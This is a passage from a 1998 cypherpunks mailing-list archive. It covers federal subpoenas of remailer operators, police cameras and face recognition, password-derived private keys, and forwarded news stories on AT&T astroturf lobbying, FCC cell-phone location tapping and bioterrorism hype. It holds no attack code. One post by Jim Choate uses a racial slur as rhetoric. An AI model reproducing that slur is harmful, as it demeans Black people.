information related, but not necessarily directly involved in this matter."
The sub-channel message is "Don't fuck with us, you're only about a hairs
breadth away from hell on earth."

Besides, they wanted me to testify *for* the prosecution, preferebly
willingly. The last thing they were going to do was go heavy handed.

> even the distributed node instance. If Igor Chudov, Lance Cottrell, and Jim
> Choate all have to fly to Seattle and face scrutiny, implied threats, and
> possible jail time for failing to jump when the Feds say jump, they may
> decide to stop acting as Fed magnets.

If the operators are that jumpy I suspect they wouldn't put up with the
bills, occassional stupid private emails, the costs in time, etc. I knew
this sort of stuff was a possibility. The only issue that took me by
surprise was two officers showing up at work unannounced. It took me till
the next day to burn off the heeby-jeebies from that.

Of course, a truly motivated and worried, not to mention well heeled,
cypherpunks might consider putting up a node themselves....<nah>


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Wed, 28 Oct 1998 09:38:16 +0800
To: ILovToHack@aol.com
Subject: Re: Rendering ( was MIB Subponeas )
Message-ID: <22350d1a55de7eca4ce6d742efc0efc9@anonymous>
MIME-Version: 1.0
Content-Type: text/plain





ILovToHack@aol.com wrote:
> 
> First of all i want to apoligize for posting this.
> Second i am a little off on the AP bot could some one please take the time to
> explain this to me.  Thanks.
> -Mike

Pity. You're on it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 28 Oct 1998 07:52:42 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Cameras in Public Places (fwd)
Message-ID: <199810272334.RAA09993@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 26 Oct 1998 11:57:22 -0800
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Cameras in Public Places

[ravage: don't remember who said it... > > ]

> > Privacy is also needed on public places (e.g., violated by face 
> > recognition systems)

Anonymity is not equal to privacy.

> The appropriate way of dealing with them is to wait for some people to
> be misidentified and then file suit against the municipality using the
> equipment. Harassment, false arrest, invasion of privacy, abuse of
> power, loss of reputation, loss of the ability to earn a living - take a
> few of the cities for $10 or $20 million and they'll get the message
> that they've been had by the SW vendors.

It makes no more sense to outlaw cameras in private or public places than it
does to outlaw printing presses in some areas, a very basic way they're
identical from the perspective of the law - it isn't the media that matters
(with little respect to Marshall). What matters is they record some
'instance' and allow it to be distributed widely.

What we do need is a mechanism that prohibits the police or other law
enforcement bodies from access without a properly served warrant. Camera use
in say a mall is permissible because it's the vendors who pay the rent who
are deciding what is and isn't safe - not the customers of those vendors.
It's permissible in traffic control and such because it is cost effective in
those applications. In traffic control, if a motorist stalls or a wreck
occurs the civilian (ie non-LEA) operators can call the necessary resources
into play. Once the cop is on the scene a warrant could be issued if charges
of some sort are filed. Ulitimately, what we need is a law that says:

All law enforcement personnel are prohibited from accessing public or
private documents in the course of their duties without a properly served
and executed warrant.

The two key points are 'public and private' and 'course of their duties'. A
cop should be able to walk into a public library and get a book on some
subject of interest (even law enforcement). But if it's related to the
LEA's cases then a warrant should be required to step foot in the building.
Now if he's a beat cop walking his patrol he obviously can't stop chasing a
perp on the run who traverses the library (though it is highly unlikely they
would stop to read, but imagine a dope deal just as well).

Now, one way to deal with that is to insert some sort of phrase about
'openly accessible' or 'anonymously accessible' (that way the question
becomes does one need an ID, if so then you need a warrant).


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 28 Oct 1998 07:57:14 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: looking for articles (fwd)
Message-ID: <199810272340.RAA10108@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: 	Tue, 27 Oct 1998 18:13:14 -0500 (EST)
> From: Homayoun Saleh <hsaleh@phoenix.Princeton.EDU>
> Subject: looking for articles

> 	I am looking for any articles or papers having to do with the
> computability of Poisson distributions in the plane, and someone suggested
> I ask this list. If anyone knows of anything related, or where else
> I should be looking, please let me know.
> Thanks a lot.

Not sure it's what you're looking for but:

Statistical Distributions
M. Evans, N. Hastings, B. Peacock
ISBN 0-471-55951-2

It's got around 40 different distributions and their related equations and
characteristics. There is also an appendix that lists the various
distributions and the functions in several computational math programs (go
MapleV !)...

Now if you're looking for various approaches to how to impliment it then I
can't help you there, I cookbook that sort of stuff out of my library.

Have you tried Knuth?


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 28 Oct 1998 08:05:21 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Rendering ( was MIB Subponeas ) (fwd)
Message-ID: <199810272344.RAA10172@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 26 Oct 1998 11:31:52 -0800
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Rendering ( was MIB Subponeas )

> Collecting real names and addresses is, apparently, enough of a concrete
> step to at least begin the "rendering" process. 

Which is the whole point of probable cause and civil rights.

It turns out the 'respect' part is the hard one...;)

> press-squashing, poison-cow BST boys ). Then what would be needed is
> some sort of Eternity Service for an active server - detect tampering
> and jump hosts.

Actualy, something like Plan 9 would be more effective. That way the thing
is distributed from the get go. With a suitably object oriented approach it
could be feasible to distribute the data to specific servers but encode the
program in the connections between the servers task swappers. By using Plan
9's economic resource bidding model it injects a level of anonymity in the
repetitive execution aspect that wouldn't normaly be there.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Steel - Java Design Center McLean VA <Chris.Steel@East.Sun.COM>
Date: Wed, 28 Oct 1998 07:44:12 +0800
To: "RedRook" <cypherpunks@toad.com
Subject: Re: Using a password as a private key.
Message-ID: <199810272300.SAA22409@hutch.East.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



Why not encrypt the private key with a 128 bit symmetric key (created from the hash of a username and paasword)
and store on a keyserver, along with the public key?
That way, you don't have to store it yourself locally, you get it off the keyserver.
I wrote a keyserver that does just that.  In addition, it also verifies ies the user before returning the key.
It requires the user to encrypt a known string with a separate password.
The encrypted string is sent to the keyserver, encrypted with the keyserver's public key.
Seems rather safe. Anyone disagree?

-Chris

P.S. I might not use it for military purposes, but for company email...

"RedRook" <redrook@yahoo.com> wrote:
>Date: Tue, 27 Oct 1998 13:53:07 -0800 (PST)
>&#130;&#130;&#130;&#130;Assymetic crypto systems such as
>Diffie-Hellman, El-Gamel, and DSS, allow the private key to be a
>randomly chosen number. &#130;But, as a cute hack, instead of using a
>random number, for the private key, you could use a hash of the User
>Name, and a password. 
>
>Doing so allows the users to generate their private key on demand.
>They don't have to store the private key, and if they want to work on
>a another computer, they don't need to bring along a copy.&#130;
>Has any one tried this? Is there existing software that does this? Any
>comments on the security of such a scheme? &#130;
>The only draw back that I can think of is the potential lack of
>randomness in the key. If the user chooses a bad password, it would be
>possible to brute force the public key.&#130;
>Harv.&#130;&#130;RedRook@yahoo.com&#130;&#130;&#130;&#130;&#130;&#130;&#130;&#130;
>_________________________________________________________
>DO YOU YAHOO!?
>Get your free @yahoo.com address at http://mail.yahoo.com
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homayoun Saleh <hsaleh@phoenix.Princeton.EDU>
Date: Wed, 28 Oct 1998 07:53:57 +0800
To: cryptography@c2.net
Subject: looking for articles
Message-ID: <Pine.GSO.4.03.9810271809410.16431-100000@sunlab3.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain




	Hello, 
	
	I am looking for any articles or papers having to do with the
computability of Poisson distributions in the plane, and someone suggested
I ask this list. If anyone knows of anything related, or where else
I should be looking, please let me know.
Thanks a lot.

Cheers,
Homayoun




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 28 Oct 1998 08:37:01 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: UK police chase crooks on CCTV (fwd)
Message-ID: <199810280020.SAA10370@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: bill.stewart@pobox.com
> X-Sender: wcs@idiom.com (Unverified)
> Date: Mon, 26 Oct 1998 09:27:28 -0800
> Subject: Re: UK police chase crooks on CCTV (fwd)

> >> ``The only people entered on to the system will be convicted criminals
> >> who, through our intelligence, we believe are habitually committing
> >> crimes in the area,''

> >> Dave Armond as saying. ``If people are not committing crime they have
> >> nothing to fear, but if they are among the small minority who are, the
> >> message is, 'We are watching out for you.'''

> The policeman's statement, if honest, implies that the 
> system needs a real mugshot or more detailed set of pictures to work from, 
> so they're going to start with feeding it the Usual Suspects,
> for whom they can get good data for the system to search.
> It probably also has capacity limitations, so they won't be searching
> for everybody they have pictures of, just the most likely.

For now. What's the curve on facial recognition for 2x improvement?

It would seem probable to me that there would be a feature to snap closeups
off the cameras and feed them back in real-time. Talk about real-time traffic
analysis.

> >We need a law or court ruling pretty quickly in the US that sets the
> >standard that a group of people have no more or less rights than an
> >individual. This will required LEA's to provide probable cause prior to any
> >actions against groups of people (such as this).
> 
> Ain't gonna happen - are you kidding?  If there is a ruling like that,
> it'll be done in some way that restricts citizen rights rather than
> expanding them, or expands police powers rather than restricting them.

I'll have to disagree.

> It's already legal for cops to hang around street corners watching for 
> suspicious activities or suspicious people, and all video recognition

Um, it was always legal and should continue to be so, just as it should be
legal for you or I to stand around that corner and watch for unusual
activity. It's there job. They call it walking the beat.

> Unfortunately, I'm being increasingly forced to take the David Brin position of
> "Cameras are cheap, get used to it, just make sure we have more cameras
> pointing at the cops than they have pointing at us, and make sure
> the cameras the government has are citizen-accessible as well."

I don't know about citizen-accessible. I don't want some joe blow walking
down the street to get access to the cameras that track my trek to work each
day. No, it needs to be very limited and require full interaction of the
courts to gain access. Simply putting on a police uniform (or a army
uniform) shouldn't mean you give up your rights as a citizen.

This may be hard to believe, but I'm not the state's nigger and neither is
that police officer or soldier.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 28 Oct 1998 11:39:22 +0800
To: cypherpunks@cyberpass.net
Subject: IP: 'Grass-Roots' Lobbyists Unrobed as AT&T
Message-ID: <199810280309.TAA27071@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: 'Grass-Roots' Lobbyists Unrobed as AT&T
Date: Sat, 24 Oct 1998 07:46:23 -0500
To: believer@telepath.com

Source:  Washington Post
http://www.washingtonpost.com/wp-srv/digest/wtech002.htm

'Grass-Roots' Lobbyists Unrobed as AT&T 

By Jackie Spinner
Washington Post Staff Writer
Saturday, October 24, 1998; Page A1 

The Prince George's Coalition Against Hidden Taxes billed itself as a
"grass-roots" organization when it formed 10 days ago to fight proposed
legislation that would charge telecommunications companies seeking to
provide new telephone, Internet or other services. 

In those two weeks, the coalition, which has a paid spokesman and a
professional public relations firm at its disposal, has spent $50,000 on
radio, newspaper and television ads suggesting that the law would create a
"hidden tax" on telephone use for all residential and business customers in
Prince George's County. 

In fact, it is not clear what the legislation would mean for consumers. But
this much is certain: There is very little that is "grass roots" about the
Prince George's Coalition Against Hidden Taxes, which is a massive
lobbying effort by AT&T to quash efforts by Prince George's County to
cash in on the emergence of new communications technologies. 

The media campaign, which Prince George's County Executive Wayne K.
Curry (D) called a "disgraceful fraud," demonstrates how much is at stake
for a rapidly changing telecommunications industry and for a local
government that stands to collect about $6 million a year by taxing
providers of new services. 

Under the proposed legislation, the county would collect 3 percent of
gross revenue generated by companies that seek to use public rights of
way to lay cable, string wire or plant cellular towers to provide new
services. Prince George's County Council members are scheduled to vote
on the legislation Wednesday. 

Prince George's County is the first local jurisdiction in the Washington
region to consider a broad telecommunications fee for using public rights
of way. Governments across the country are struggling with similar efforts,
trying to get fair compensation while encouraging companies to come in
and provide services after the 1996 Telecommunications Act opened the
doors to competition. 

AT&T officials said the legislation is unfair and singles out
telecommunications firms from other users of public land, such as the
Washington Suburban Sanitary Commission, Washington Gas Light Co.
and Potomac Electric Power Co. 

"It's a money grab," said Ross Baker, director of governmental affairs for
AT&T in Maryland. "We pay handsomely right now for the occupancy of
the right of way." 

AT&T now pays permit fees and personal property taxes on equipment
located on public rights of way in Prince George's. The company
estimated those costs to be about $218,000 a year. 

According to AT&T, all phone customers' monthly bills could increase 3
percent to 15 percent if the legislation is passed because the cost would
have to be passed on to consumers. The company said it would indicate
on the bill what portion was the result of a "Prince George's County"
surcharge. 

"Telephone bills are going to go up," said Steve Novak, spokesman for
the AT&T-led coalition. 

County officials and the communications lawyer the county hired to draft
the legislation dispute that contention. They said the legislation
specifically
exempts from the fee basic telephone services such as those provided by
Bell Atlantic. But telecommunications companies, including Bell Atlantic,
would pay a fee for running new Internet lines or providing telephone
service over cable wires, something AT&T is exploring in some markets.
Companies also would be charged for offering new call waiting and call
forwarding features. 

"This legislation will not cause an increase in the prices of traditional
telephone service," said Nicholas P. Miller, the D.C.-based
communications lawyer advising the county. "On the other hand, because
billing is largely deregulated, we have no control over how the companies
may misrepresent the effect of this local rental charge." 

John Dillon, Bell Atlantic's vice president of external affairs, said the
company is opposed to legislation that taxes revenue for any of its
activities, traditional or otherwise. 

"If the county wants to sit down and talk about what costs are not being
covered, we will do that," he said. 

Thomas Haller, president of the Prince George's Chamber of Commerce,
which held what it called an emergency meeting yesterday to discuss the
legislation, said the bill could deter telecommunications companies from
doing business in the county. 

"If companies are dissuaded from providing telecommunications services
here because they can't compete, we're not going to have much
competition," Haller said. 

Novak said AT&T formed the coalition to warn the public about the
county's proposal. People calling the coalition to express their concern
about the legislation are quickly transferred to the office of their County
Council member. 

"We are trying to educate the public," Novak said. 

Council member M.H. Jim Estepp (D-Upper Marlboro), who sponsored
the legislation, said he received calls from residents at a rate of about 16
an hour during one day this week. Often, he said, callers were
disconnected when he started to explain his position. (Novak said the
disconnections are not intentional.) 

"These are big-time tactics, and when big money tries to crush local
government, not only are they doing a disservice to the county, that
becomes the issue," Estepp said. 

Curry agreed. "This isn't any citizens coalition. This is a bunch of giant
companies trying to profit off the public for free," he said. 

But AT&T spokesman Stephen H. Clawson said consumers are the ones
who will be hurt. 

"We found out that there was considerable confusion and concern about
the legislation," he said. "We have an obligation to our customers." 

 (c) Copyright 1998 The Washington Post Company 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 28 Oct 1998 11:37:47 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Cell phone tapping stirs debate
Message-ID: <199810280309.TAA27081@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Cell phone tapping stirs debate
Date: Sun, 25 Oct 1998 08:49:06 -0600
To: believer@telepath.com

Source:  USA Today
http://www.usatoday.com/life/cyber/tech/ctd698.htm

10/22/98- Updated 12:08 PM ET
 The Nation's Homepage

 Cell phone tapping stirs debate

 WASHINGTON -- Law enforcement officials say they need to
 know where a suspected criminal is when he makes a cellular
 telephone call. Federal regulators are proposing to give them the
 capability to find out.

 The Federal Communications Commission without dissent
 proposed Thursday that cellular phone companies make technical
 changes so the FBI, police and other law enforcers -- as long as a
 court approves -- can locate a person talking on a mobile phone.

 This and other additional wiretapping capabilities being proposed
 aim to help law enforcers keep pace with technology.

 With some 66 million cellular phone customers, police want the
 authority to legally tap cell phones to track down drug dealers,
 terrorists and kidnappers. But some groups worry that such a
 practice could violate privacy.

 The location proposal is part of a larger plan to implement a 1994
 law that requires telecommunications companies to make changes
 in their networks so police can carry out court-ordered wiretaps in
 a world of digital technology. The proposal is based on a plan
 from the telecommunications industry.

 ''We think this is a positive step forward,'' said Stephen Colgate,
 the Justice Department's assistant attorney general for
 administration. ''In many kidnapping cases, it would have been
 very helpful to have location information.''

 But James Dempsey, counsel to the Center for Democracy and
 Technology, a privacy group, said: ''We're prepared to fight this
 one every step of the way.''

 FCC Chairman Bill Kennard stressed that police would have no
 access to locations without a court order.

 ''A lot of people are saying the FCC will turn mobile phones into
 tracking devices for the FBI and invade Americans' privacy. I
 don't believe that will be the case,'' Kennard said.

 With a court order, police already can legally listen in to cell phone
 conversations, and, in some instances, get information on the
 caller's location.

 But not every company has the technical ability to provide a
 caller's location. This proposal, if adopted, would set up a
 nationwide requirement for companies to follow.

 The legal standard for obtaining a location is lower than the
 standard for a wiretap order in which police must show a judge
 there is probable cause of criminal activity.

 Under the proposal, police would only need to show the location
 is relevant to an investigation. Privacy groups say that means the
 government could easily track the movements not only of a
 suspect, but also of associates, friends or relatives.

 It would give police the ability to obtain the cellular phone user's
 location at the beginning and end of a wiretapped call.

 The proposal would provide police with that information based on
 the cellular tower, or ''cell'' site, where a call originated and ended.
 That would give information on the caller's location within several
 city blocks in an urban area to hundreds of square miles in a rural
 area.

 The FBI had been seeking more exact location information.

 The FCC also is expected to tentatively conclude that companies
 must give police, as long as a court approves, additional
 capabilities -- beyond minimum technical standards already
 proposed by the industry -- so their ability to conduct wiretaps
 won't be thwarted.

 The additional capabilities being sought by the FBI that were
 advanced by the FCC include:

Letting police listen in on the conversations of all people on
a conference call, even if some are put on hold and no
longer are talking to the target of a wiretap. 

Letting police get information when the wiretap target has
put someone on hold or dropped someone from a
conference call, and letting them find out if the wiretap
target has used dialing features -- such as call waiting or call
forwarding. 

Giving police the number dialed by a wiretap target when
the suspect, for instance, uses a credit or calling card at a
pay phone. 

 Privacy groups and the telephone industry contend the additional
 capabilities sought by the FBI go beyond the 1994 law and are an
 attempt to broaden wiretapping powers. The FBI says it merely
 wants to preserve the ability to conduct legal wiretaps in a world
 of constantly changing technology.

 The FCC is involved because the Justice Department, FBI and the
 telecommunications industry, after three years of negotiations,
 were unable to reach agreement on the larger plan for
 implementing the 1994 law.

 All interested parties will get a chance to offer opinions on the
 proposal, which could be revised. Kennard wants a final plan
 adopted by the end of the year.

 (c)COPYRIGHT 1998 USA TODAY, a division of Gannett Co. Inc.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 28 Oct 1998 11:41:08 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Bioterrorism: America's Newest War Game
Message-ID: <199810280309.TAA27092@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Bioterrorism: America's Newest War Game
Date: Mon, 26 Oct 1998 06:07:57 -0600
To: believer@telepath.com

Source:  The Nation
http://www.thenation.com/issue/981109/1109PRIN.HTM

BIOTERRORISM 
 AMERICA'S NEWEST WAR GAME 

 BY PETER PRINGLE 

 "Catastrophic Terrorism" roars the headline over an article in the current
Foreign
 Affairs. The three distinguished authors--John Deutch, a former director
of Central
 Intelligence; Ashton Carter, an ex-Pentagon assistant secretary; and
Philip Zelikow, a
 former member of the National Security Council--declare with unswerving
certainty
 that "the danger of weapons of mass destruction being used against America
and its
 allies is greater now than at any time since the Cuban Missile Crisis of
1962." Any act
 of "catastrophic terrorism," they say, could have the effect of Pearl
Harbor; it could
 divide America into a "before and after." 

 This is no shot across the bow of a sleeping ship. America is now spending
$7 billion a
 year defending itself against backpack nuclear bombs, canisters of nerve
gas and petri
 dishes of germ weapons planted in crowded cities by an as-yet-unknown
adversary.
 So many different agencies are shoring up the nation's defenses against
 mega-terrorism, says the government auditor, that it's hard to keep track
of where all
 the money is going, let alone whether it is being spent wisely. 

 Any new government project tagged with the word "terrorism" goes to the
top of the
 pile in Congress. The Pentagon is ordering devices to sniff out nerve
gases and deadly
 germs. National Guard units that normally deal with floods and hurricanes
are being
 trained as chemical and biological SWAT teams. Under the threat of another
war with
 Iraq, all 2.4 million American troops are being vaccinated against
anthrax, and
 companies are scrambling to provide the vaccines--including, notably, a
company
 founded by Adm. William Crowe Jr., a former chairman of the Joint Chiefs
of Staff.
 The FBI wants to send more agents into embassies abroad and is demanding
its own
 planes to shuttle investigative teams around the world. Local and state
governments
 used to dealing with flu epidemics are preparing for the nightmare gas or
microbe
 attack. And one can only imagine what antiterrorist projects the CIA has been
 dreaming up with its "black" budget of covert ops. Now the players in this
new war
 game have got a new title for their grim pursuit. 

 The thrust of "Catastrophic Terrorism" is a grand reorganization of the
Pentagon, CIA
 and FBI bureaucracies to eliminate the perennial agency overlaps and gaps
between
 "foreign" and "domestic" terrorism. The authors want to pool intelligence
at the FBI,
 create new Catastrophic Terrorism Response Offices, already dubbed CTROs, and
 cut the two dozen agencies with shopping lists for vaccines, gas sniffers
and protective
 clothing down to one--the Defense Department--because, they say, the
Pentagon has
 the expertise when it comes to rapid acquisition. The operation sounds
like it's a few
 steps short of war mobilization. 

 All but the new title, perhaps, could have been predicted (the original
choice, "Grand
 Terrorism," was rejected on the grounds that there is nothing grand about
this method
 of warfare). Beached by the fall of Communism and the end of the cold war,
planners
 in the Pentagon and military think tanks have been circling a number of
new threats:
 First it was drug wars and then "rogue" states; but international
terrorism has an
 enduring quality in the annals of "threat politics." By dividing the
phenomenon into two
 distinct parts--conventional and catastrophic--Deutch, the quintessential
 academic/consultant to the Pentagon and the defense industry, and his
co-authors have
 mirrored the old cold war categories of conventional and nuclear weapons. 

 Conventional terrorist weapons are truck bombs filled with fertilizer
explosive.
 Catastrophic terrorist weapons are nuclear, chemical and especially
biological--the
 very weapons President Nixon renounced three decades ago in an effort to
prevent
 their spread to other countries. The sixties US arsenal of biological
weapons--then the
 world's largest and most sophisticated--has come back to haunt those now
charged
 with the defense of the nation. 

 Chemical weapons of mass destruction have been used in state-sponsored
 warfare--by Iraq against Iran and its own Kurdish population--and
fragments of
 Saddam Hussein's dismantled Scud missiles were alleged by US investigators
to have
 traces of VX, the deadliest of all nerve gases. The worry is that such
weapons could
 also be used by Islamic fundamentalist groups such as the one that
President Clinton
 said he was concerned about when he recently authorized the firing of
cruise missiles at
 a pharmaceutical plant in Sudan--or by groups such as the Japanese cult Aum
 Shinrikyo, or by homegrown US adherents to survivalism. 

 No one denies the threat of catastrophic terrorism, but the pace at which
it has taken
 center stage as the prime threat to US security is almost as unnerving as
the threat
 itself. In the media, Russian defectors talk alarmingly of new strains of
untreatable
 anthrax and deadly cocktails of smallpox and Ebola; teenage hackers invade
 super-secret Pentagon computers; Aum Shinrikyo is said to be back in
force, if not in
 action, after the Tokyo subway nerve gas incident; and three Texans are
charged with
 plotting to assassinate President Clinton with a cactus needle coated with
botulin
 flicked from a cigarette lighter. 

 Outside the calm of the international affairs departments of MIT and
Harvard (where
 Deutch and Carter work), or the offices of the Washington Beltway
"bandits" bulging
 with profits from new contracts related to terrorism, or indeed in the
Pentagon itself,
 where new acronyms bloom, a sense of panic is in the air. Expert after
expert says it's
 not a question of if but when this doomsday will occur. The media cast
around for
 bogymen and find Russia with its rusting biological weapons labs and
penniless
 scientists who could aid and abet the new bioterrorists. 

 Actually, in most years since 1980 the number of Americans killed by
terrorists has
 been fewer than ten, but the toll can suddenly jump. In 1983, 271
Americans were
 killed by terrorist attacks, most of them in the bombing of the Marine
barracks in
 Lebanon. Then came bombs at the World Trade Center in 1993 (six dead, 1,000
 injured), the Oklahoma City federal building in 1995 (168 dead, 500
injured) and the
 Khobar Towers Air Force housing complex in Saudi Arabia in 1996 (nineteen
dead,
 500 injured). The World Trade Center in New York is often taken as a
starting point
 for the new concern. What if the World Trade Center bomb had been nuclear,
or had
 dispersed a deadly pathogen? 

 In the rush to play a new war game there is always a tendency to hype the
threat. Last
 November Defense Secretary William Cohen appeared on TV holding a bag of
sugar
 claiming the equivalent amount of anthrax spores would be enough to kill
half the
 population of Washington, DC, an illustration that would only be valid if
the dispersal
 were perfect and the wind were always blowing in the right direction.
Republican
 Senator Fred Thompson, chairman of the Senate Governmental Affairs Committee,
 asked meekly of the terrorist threat, "Is it being overblown?" (The pun
was apparently
 unintended.) 

 There is, after all, no 100 percent protection against chemical or biological
 weapons--as there was no 100 percent protection against nuclear weapons. That
 doesn't prevent the rise of a new threat industry, of course, but one must
ask whether
 there is a way of averting catastrophe other than building Fortress America. 

 One of the true believers in the need for elaborate defenses against germ
weapons is
 none other than President Clinton. He became a convert, and started
pushing for
 stockpiles of vaccines, after reading--among all the intelligence reports
on terrorism
 and the Iraq crisis--a novel titled The Cobra Event, about a fictitious
germ attack on
 Manhattan using a mixture of smallpox and cold viruses. Chemical and
biological
 warfare is great fiction material, of course, but are we in danger of
being unable to
 separate fact from fiction? 

 The author of the novel, Richard Preston, also wrote a non-fiction account
of the rise
 of "bioterrorism" in a March issue of The New Yorker. The article quoted a
Russian
 who was involved in the Soviet biological weapons program named Kanatjan
 Alibekov, who had been the Number Two in charge of the weapons section of the
 archipelago of Soviet biological plants known as Biopreparat. He
"defected" in 1992,
 a year after the fall of Communism, and changed his name to Ken Alibek. In
The New
 Yorker he said the Soviets had built huge plants for the production of
biological
 weapons. 

 In the 1972 Nixon-negotiated Biological Weapons Convention, which
prohibited the
 development, production and stockpiling of these weapons, there was a
loophole; the
 treaty did not prevent countries from building a production line for such
weapons and
 keeping it in reserve. This is what the Soviets did--something US
intelligence had
 known about for some time. 

 But Alibek claims that the Russians had actually used these facilities to
produce tons of
 deadly anthrax, some of which had been genetically engineered so that
available
 vaccines were useless, and some of which may have been put into the
warheads of
 intercontinental ballistic missiles. Alibek also asserted that the
Russians had
 experimented with deadly cocktails of smallpox spiked with the Ebola
virus, which
 causes internal hemorrhaging, and with Venezuelan equine encephalitis, a
brain virus. 

 For almost a dozen breathless pages, The New Yorker treated its readers to
 gruesome details of the power of these pathogens, pausing only when the
author,
 himself out of puff, asked the key question: Does anyone believe Alibek?
Or is he, as a
 defector who has apparently outlived his usefulness to the CIA's covert
intelligence
 world, trying to make a buck in civvy street by exaggerating the
importance of his
 information? Preston consulted an old cold warrior, Bill Patrick, the
retired US
 biological warfare expert who was chief of product development for the US
Army's
 biological warfare laboratories at Fort Detrick, Maryland. Patrick, quite
reasonably for
 an old campaigner, takes the defector on trust; if Alibek doesn't know
what the
 Soviets were doing, then who does? But other scientific experts, not given
a hearing
 until page twelve of the thirteen-page New Yorker article, ranged from
skeptical to
 dismissive. 

 One was Dr. Peter Jahrling, the chief scientist at the US Army medical
research
 Institute of Infectious Diseases. He was one of Alibek's original
debriefers. Jahrling
 told The New Yorker, "His [Alibek's] talk about chimeras [mixtures] of
Ebola is sheer
 fantasy, in my opinion." Preston also consulted Joshua Lederberg, the Nobel
 Prizewinning molecular biologist and a member of a working group at the
National
 Academy of Sciences who advises the government on biological weapons and the
 potential for terrorism. Lederberg told Preston, "It's not even clear to
me that adding
 Ebola genes to smallpox would make it more deadly." Putting these comments
higher
 up in the article would have been more responsible journalism, clearly,
but it would
 also have spoiled the story. 

 The week before the New Yorker article ran, Alibek was given his first
television
 exposure, on Diane Sawyer's PrimeTime Live show. "Biological weapons. They're
 real, they're here...smallpox, Ebola, anthrax," was how the hourlong show
began.
 Alibek told Sawyer that the Russians had created a deadly genetic merger
of smallpox
 and Ebola. "In this case, [the] mortality rate [is] about 90 percent, up
to 100 percent.
 No treatment techniques," warned Alibek. "How many people could they have
killed?"
